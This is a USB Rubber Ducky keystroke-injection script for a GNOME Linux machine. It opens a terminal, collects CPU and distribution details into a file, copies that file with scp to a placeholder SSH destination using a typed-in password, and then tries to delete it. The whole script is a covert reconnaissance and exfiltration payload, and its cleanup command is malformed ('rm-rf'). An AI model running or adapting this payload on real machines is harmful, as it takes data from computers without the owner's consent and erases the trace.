DELAY 1000
ALT F2
DELAY 100
STRING gnome-terminal
DELAY 500
ENTER
DELAY 500
STRING echo "CPU:" >> ducky.txt
DELAY 500
ENTER
DELAY 500
STRING echo " " >> ducky.txt
DELAY 500
ENTER
STRING lscpu >> ducky.txt
DELAY 500
ENTER
DELAY 500
STRING echo " " >> ducky.txt
DELAY 500
ENTER
DELAY 500
STRING echo "Linux Distro & Version:" >> ducky.txt
DELAY 500
ENTER
DELAY 500
STRING echo " " >> ducky.txt
DELAY 500
ENTER
DELAY 500
STRING lsb_release -a >> ducky.txt
DELAY 500
ENTER
DELAY 500
STRING scp $HOME/ducky.txt [ssh address]
DELAY 500
ENTER
DELAY 500
STRING [password]
DELAY 500
ENTER
DELAY 200
STRING rm-rf $HOME/ducky.txt
ENTER
DELAY 200
STRING exit
ENTER

REM example: root@192.168.1.100:~/
